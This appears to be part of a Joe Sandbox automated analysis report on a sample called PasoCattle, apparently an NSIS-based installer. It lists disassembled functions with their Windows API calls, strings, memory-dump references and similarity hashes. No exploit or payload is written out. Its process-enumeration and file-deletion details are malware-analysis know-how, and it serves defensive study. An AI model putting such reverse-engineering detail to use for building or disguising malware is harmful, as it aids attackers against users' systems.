DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
lstrlenW.KERNEL32(?), ref: 00406D58
FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
FindClose.KERNEL32(?), ref: 00406E5F

Strings

\*.*, xrefs: 00406D2F
Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
Delete: DeleteFile failed("%s"), xrefs: 00406E29
RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
ptF, xrefs: 00406D1A
RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
Delete: DeleteFile("%s"), xrefs: 00406DE8

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
API String ID: 2035342205-1650287579
Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE

Function 004044D1 Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 300stringkeyboardCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F0), ref: 00404525
IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
GetDlgItem.USER32(?,000003FB), ref: 00404553
GetAsyncKeyState.USER32(00000010), ref: 0040455A
GetDlgItem.USER32(?,000003F0), ref: 0040456F
ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
SetWindowTextW.USER32(?,?), ref: 004045AF
SHBrowseForFolderW.SHELL32(?), ref: 00404669
lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
CoTaskMemFree.OLE32(00000000), ref: 00404674

Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3

Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB

GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,759223A0,00000000), ref: 00406902

SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819

Strings

F, xrefs: 004046A0
A, xrefs: 00404662

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
String ID: F$A
API String ID: 3347642858-1281894373
Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59

Function 00406EFE Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
lstrcmpA.KERNEL32(name,?), ref: 00406FF3
CloseHandle.KERNEL32(?), ref: 00407212

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

%s: failed opening file "%s", xrefs: 00406F38
GetTTFNameString, xrefs: 00406F33
name, xrefs: 00406FEB

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
String ID: %s: failed opening file "%s"$GetTTFNameString$name
API String ID: 1916479912-1189179171
Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75

Function 00406831 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,759223A0,00000000), ref: 00406902
GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,759223A0,00000000), ref: 00406A73

Strings

Software\Microsoft\Windows\CurrentVersion, xrefs: 00406952
F, xrefs: 00406858
F, xrefs: 00406A7F
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406A0B

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 3581403547-1792361021
Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59

Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E

Strings

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: CreateInstance
String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
API String ID: 542301482-1377821865
Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54

Function 004079A2 Relevance: .3, Instructions: 347COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95

Function 0040737E Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85

Function 004063D8 Relevance: 70.3, APIs: 29, Strings: 11, Instructions: 256libraryloadermemoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
lstrlenW.KERNEL32(?), ref: 004063F8
GetVersionExW.KERNEL32(?), ref: 00406456

Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D

LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
FreeLibrary.KERNEL32(00000000), ref: 00406500
GlobalFree.KERNEL32(?), ref: 00406509

Strings

EnumProcessModules, xrefs: 004064B6
Module32FirstW, xrefs: 004065FF
Process32NextW, xrefs: 004065F4
PSAPI.DLL, xrefs: 00406490
CreateToolhelp32Snapshot, xrefs: 004065E1
Process32FirstW, xrefs: 004065E9
Module32NextW, xrefs: 0040660A
GetModuleBaseNameW, xrefs: 004064C0
Kernel32.DLL, xrefs: 004065C7
EnumProcesses, xrefs: 004064AE
Unknown, xrefs: 00406528

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
API String ID: 20674999-2124804629
Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59

Function 004040E4 Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 210windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
GetDlgItem.USER32(?,000003E8), ref: 004041AD
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
GetSysColor.USER32(?), ref: 004041DB
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
lstrlenW.KERNEL32(?), ref: 00404202
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E

Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030

GetDlgItem.USER32(?,0000040A), ref: 00404276
SendMessageW.USER32(00000000), ref: 0040427D
GetDlgItem.USER32(?,000003E8), ref: 004042AA
SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
SetCursor.USER32(00000000), ref: 004042FE
ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
SetCursor.USER32(00000000), ref: 00404322
SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363

Strings

F, xrefs: 004042D3
open, xrefs: 0040430B
N, xrefs: 00404298

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
String ID: F$N$open
API String ID: 3928313111-1104729357
Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99

Function 00406AC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 163filestringmemoryCOMMON

Download Yara Rule

APIs

lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD

Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24

GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
wsprintfA.USER32 ref: 00406B79
GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63

Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
GlobalFree.KERNEL32(00000000), ref: 00406C7E
CloseHandle.KERNEL32(?), ref: 00406C88

Strings

[Rename], xrefs: 00406BF4, 00406C03
%s=%s, xrefs: 00406B6F
NUL, xrefs: 00406ACA
^F, xrefs: 00406ACF
plF, xrefs: 00406B54

Memory Dump Source

Source File: 00000002.00000002.2113977143.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2113923102.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2113997534.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114032019.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2114218450.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd

Similarity

API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
String ID: ^F$%s=%s$NUL$[Rename]$plF
API String ID: 565278875-3368763019
Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 127COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010D8
FillRect.USER32(00000000,?,00000000), ref: 004010ED
DeleteObject.GDI32(?), ref: 004010F6
CreateFontIndirectW.GDI32(?), ref: 0040110E
SetBkMode.GDI32(00000000,00000001), ref: 0040112F
SetTextColor.GDI32(00000000,000000FF), ref: 00401139
SelectObject.GDI32(00000000,?), ref: 00401149
DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
SelectObject.GDI32(00000000,00000000), ref: 00401169
DeleteObject.GDI32(?), ref: 0040116E
